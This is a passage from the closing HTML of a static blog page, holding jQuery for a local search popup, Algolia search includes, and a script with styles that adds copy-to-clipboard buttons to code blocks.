          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=6.3.0"></script>



  

  

  

  

  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('Copied')
          else $(this).text('Copy failed')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('Copy')
        }, 300)
      }).append(e)
    })
  </script>


</body>
</html>
